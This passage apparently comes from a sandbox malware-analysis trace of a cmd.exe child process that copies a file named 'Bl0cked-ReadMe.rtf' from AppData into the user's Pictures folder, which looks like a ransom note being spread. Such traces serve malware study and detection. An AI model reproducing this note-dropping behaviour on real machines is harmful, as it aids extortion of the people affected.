(in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0145.051] SetConsoleInputExeNameW () returned 0x1 [0145.051] GetConsoleOutputCP () returned 0x1b5 [0145.052] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0145.052] SetThreadUILanguage (LangId=0x0) returned 0x409 [0145.052] exit (_Code=0) Process: id = "196" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16e60" os_pid = "0x9f4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 17190 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 17191 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 17192 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 17193 start_va = 0x110000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 17194 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 17195 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 17196 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 17197 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 17198 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 17199 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 17244 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 17245 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 17246 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 17247 start_va = 0x360000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 17248 start_va = 0x3e0000 end_va = 0x4dffff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 17249 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 17250 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 17251 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 17252 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 17253 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 17254 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 17255 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 17256 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 17257 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 17258 start_va = 0x210000 end_va = 0x2d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 17259 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 17260 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 17261 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 17262 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 17263 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 17264 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 17265 start_va = 0x4e0000 end_va = 0x5e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 17266 start_va = 0x5f0000 end_va = 0x11effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 17267 start_va = 0x11f0000 end_va = 0x1352fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011f0000" filename = "" Thread: id = 254 os_tid = 0x9dc [0144.858] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20f814 | out: lpSystemTimeAsFileTime=0x20f814*(dwLowDateTime=0x90475680, dwHighDateTime=0x1d440a9)) [0144.858] GetCurrentProcessId () returned 0x9f4 [0144.858] GetCurrentThreadId () returned 0x9dc [0144.858] GetTickCount () returned 0x2d2c8 [0144.858] QueryPerformanceCounter (in: lpPerformanceCount=0x20f80c | out: lpPerformanceCount=0x20f80c*=20164720279) returned 1 [0144.859] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0144.859] __set_app_type (_Type=0x1) [0144.859] __p__fmode () returned 0x76b331f4 [0144.859] __p__commode () returned 0x76b331fc [0144.859] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0144.859] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0144.859] GetCurrentThreadId () returned 0x9dc [0144.859] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x9dc) returned 0x38 [0144.859] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0144.860] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0144.860] SetThreadUILanguage (LangId=0x0) returned 0x409 [0144.860] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0144.860] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x20f7a4 | out: phkResult=0x20f7a4*=0x0) returned 0x2 [0144.860] VirtualQuery (in: lpAddress=0x20f7db, lpBuffer=0x20f774, dwLength=0x1c | out: lpBuffer=0x20f774*(BaseAddress=0x20f000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0144.860] VirtualQuery (in: lpAddress=0x110000, lpBuffer=0x20f774, dwLength=0x1c | out: lpBuffer=0x20f774*(BaseAddress=0x110000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0144.860] VirtualQuery (in: lpAddress=0x111000, lpBuffer=0x20f774, dwLength=0x1c | out: lpBuffer=0x20f774*(BaseAddress=0x111000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0144.860] VirtualQuery (in: lpAddress=0x113000, lpBuffer=0x20f774, dwLength=0x1c | out: lpBuffer=0x20f774*(BaseAddress=0x113000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0144.860] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x20f774, dwLength=0x1c | out: lpBuffer=0x20f774*(BaseAddress=0x210000, AllocationBase=0x210000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0144.860] GetConsoleOutputCP () returned 0x1b5 [0144.860] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0144.860] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0144.860] _get_osfhandle (_FileHandle=1) returned 0x7 [0144.860] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0144.861] _get_osfhandle (_FileHandle=1) returned 0x7 [0144.861] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0144.861] _get_osfhandle (_FileHandle=1) returned 0x7 [0144.861] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0144.861] _get_osfhandle (_FileHandle=0) returned 0x3 [0144.861] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0144.861] _get_osfhandle (_FileHandle=0) returned 0x3 [0144.861] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0144.861] GetEnvironmentStringsW () returned 0x3f0188* [0144.862] FreeEnvironmentStringsW (penv=0x3f0188) returned 1 [0144.862] GetEnvironmentStringsW () returned 0x3f0188* [0144.862] FreeEnvironmentStringsW (penv=0x3f0188) returned 1 [0144.862] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20e714 | out: phkResult=0x20e714*=0x40) returned 0x0 [0144.862] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20e71c, lpData=0x20e720, lpcbData=0x20e718*=0x1000 | out: lpType=0x20e71c*=0x0, lpData=0x20e720*=0xb0, lpcbData=0x20e718*=0x1000) returned 0x2 [0144.862] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20e71c, lpData=0x20e720, lpcbData=0x20e718*=0x1000 | out: lpType=0x20e71c*=0x4, lpData=0x20e720*=0x1, lpcbData=0x20e718*=0x4) returned 0x0 [0144.862] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20e71c, lpData=0x20e720, lpcbData=0x20e718*=0x1000 | out: lpType=0x20e71c*=0x0, lpData=0x20e720*=0x1, lpcbData=0x20e718*=0x1000) returned 0x2 [0144.862] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20e71c, lpData=0x20e720, lpcbData=0x20e718*=0x1000 | out: lpType=0x20e71c*=0x4, lpData=0x20e720*=0x0, lpcbData=0x20e718*=0x4) returned 0x0 [0144.862] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20e71c, lpData=0x20e720, lpcbData=0x20e718*=0x1000 | out: lpType=0x20e71c*=0x4, lpData=0x20e720*=0x40, lpcbData=0x20e718*=0x4) returned 0x0 [0144.862] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20e71c, lpData=0x20e720, lpcbData=0x20e718*=0x1000 | out: lpType=0x20e71c*=0x4, lpData=0x20e720*=0x40, lpcbData=0x20e718*=0x4) returned 0x0 [0144.862] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20e71c, lpData=0x20e720, lpcbData=0x20e718*=0x1000 | out: lpType=0x20e71c*=0x0, lpData=0x20e720*=0x40, lpcbData=0x20e718*=0x1000) returned 0x2 [0144.862] RegCloseKey (hKey=0x40) returned 0x0 [0144.862] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20e714 | out: phkResult=0x20e714*=0x40) returned 0x0 [0144.862] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20e71c, lpData=0x20e720, lpcbData=0x20e718*=0x1000 | out: lpType=0x20e71c*=0x0, lpData=0x20e720*=0x40, lpcbData=0x20e718*=0x1000) returned 0x2 [0144.862] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20e71c, lpData=0x20e720, lpcbData=0x20e718*=0x1000 | out: lpType=0x20e71c*=0x4, lpData=0x20e720*=0x1, lpcbData=0x20e718*=0x4) returned 0x0 [0144.863] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20e71c, lpData=0x20e720, lpcbData=0x20e718*=0x1000 | out: lpType=0x20e71c*=0x0, lpData=0x20e720*=0x1, lpcbData=0x20e718*=0x1000) returned 0x2 [0144.863] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20e71c, lpData=0x20e720, lpcbData=0x20e718*=0x1000 | out: lpType=0x20e71c*=0x4, lpData=0x20e720*=0x0, lpcbData=0x20e718*=0x4) returned 0x0 [0144.863] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20e71c, lpData=0x20e720, lpcbData=0x20e718*=0x1000 | out: lpType=0x20e71c*=0x4, lpData=0x20e720*=0x9, lpcbData=0x20e718*=0x4) returned 0x0 [0144.863] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20e71c, lpData=0x20e720, lpcbData=0x20e718*=0x1000 | out: lpType=0x20e71c*=0x4, lpData=0x20e720*=0x9, lpcbData=0x20e718*=0x4) returned 0x0 [0144.863] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20e71c, lpData=0x20e720, lpcbData=0x20e718*=0x1000 | out: lpType=0x20e71c*=0x0, lpData=0x20e720*=0x9, lpcbData=0x20e718*=0x1000) returned 0x2 [0144.863] RegCloseKey (hKey=0x40) returned 0x0 [0144.863] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886373 [0144.863] srand (_Seed=0x5b886373) [0144.863] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\Bl0cked-ReadMe.rtf\"" [0144.863] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\Bl0cked-ReadMe.rtf\"" [0144.863] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0144.863] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3f18e8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0144.864] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0144.864] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0144.864] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0144.864] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0144.864] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0144.864] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0144.864] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0144.864] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0144.864] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0144.864] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0144.864] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0144.864] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0144.864] GetEnvironmentStringsW () returned 0x3f22d8* [0144.864] FreeEnvironmentStringsW (penv=0x3f22d8) returned 1 [0144.864] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0144.864] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0144.864] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0144.864] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0144.864] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0144.864] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0144.864] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0144.864] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0144.864] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0144.864] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0144.865] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x20f4e0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0144.865] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x20f4e0, lpFilePart=0x20f4dc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x20f4dc*="Desktop") returned 0x18 [0144.865] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0144.865] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x20f25c | out: lpFindFileData=0x20f25c) returned 0x3f0018 [0144.865] FindClose (in: hFindFile=0x3f0018 | out: hFindFile=0x3f0018) returned 1 [0144.865] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x20f25c | out: lpFindFileData=0x20f25c) returned 0x3f0018 [0144.865] FindClose (in: hFindFile=0x3f0018 | out: hFindFile=0x3f0018) returned 1 [0144.865] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x20f25c | out: lpFindFileData=0x20f25c) returned 0x3f0018 [0144.865] FindClose (in: hFindFile=0x3f0018 | out: hFindFile=0x3f0018) returned 1 [0144.865] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0144.866] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0144.866] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0144.866] GetEnvironmentStringsW () returned 0x3f2af8* [0144.866] FreeEnvironmentStringsW (penv=0x3f2af8) returned 1 [0144.866] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0144.866] GetConsoleOutputCP () returned 0x1b5 [0144.866] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0144.867] GetUserDefaultLCID () returned 0x409 [0144.867] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0144.867] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x20f620, cchData=128 | out: lpLCData="0") returned 2 [0144.867] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x20f620, cchData=128 | out: lpLCData="0") returned 2 [0144.867] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x20f620, cchData=128 | out: lpLCData="1") returned 2 [0144.867] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0144.867] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0144.867] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0144.867] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0144.867] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0144.867] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0144.867] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0144.867] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0144.867] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0144.867] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0144.868] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0144.869] GetConsoleTitleW (in: lpConsoleTitle=0x3e08e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0144.869] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0144.869] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0144.869] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0144.869] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0144.870] _wcsicmp (_String1="type", _String2=")") returned 75 [0144.870] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0144.870] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0144.870] _wcsicmp (_String1="IF", _String2="type") returned -11 [0144.870] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0144.870] _wcsicmp (_String1="REM", _String2="type") returned -2 [0144.870] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0144.874] _get_osfhandle (_FileHandle=1) returned 0x7 [0144.875] _get_osfhandle (_FileHandle=1) returned 0x7 [0144.875] _get_osfhandle (_FileHandle=1) returned 0x7 [0144.875] GetFileType (hFile=0x7) returned 0x2 [0144.974] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0144.974] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x20f518 | out: lpMode=0x20f518) returned 1 [0144.975] _dup (_FileHandle=1) returned 3 [0144.975] _close (_FileHandle=1) returned 0 [0144.975] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0144.975] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2~1\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x20f4e8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0144.977] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0144.977] GetConsoleTitleW (in: lpConsoleTitle=0x20f318, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0144.977] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0144.977] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0144.977] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0144.977] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0144.978] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0144.978] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x20ee7c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ee7c) returned 0x3e0e78 [0144.979] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0144.979] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0144.979] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0144.979] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x20dd88, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0144.979] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0144.979] _get_osfhandle (_FileHandle=4) returned 0x54 [0144.979] GetFileType (hFile=0x54) returned 0x1 [0144.979] _get_osfhandle (_FileHandle=4) returned 0x54 [0144.979] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x20dde0 | out: lpFileSizeHigh=0x20dde0*=0x0) returned 0x1632 [0144.979] _get_osfhandle (_FileHandle=4) returned 0x54 [0144.979] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.979] _get_osfhandle (_FileHandle=4) returned 0x54 [0144.979] ReadFile (in: hFile=0x54, lpBuffer=0x20ec18, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20de08, lpOverlapped=0x0 | out: lpBuffer=0x20ec18*, 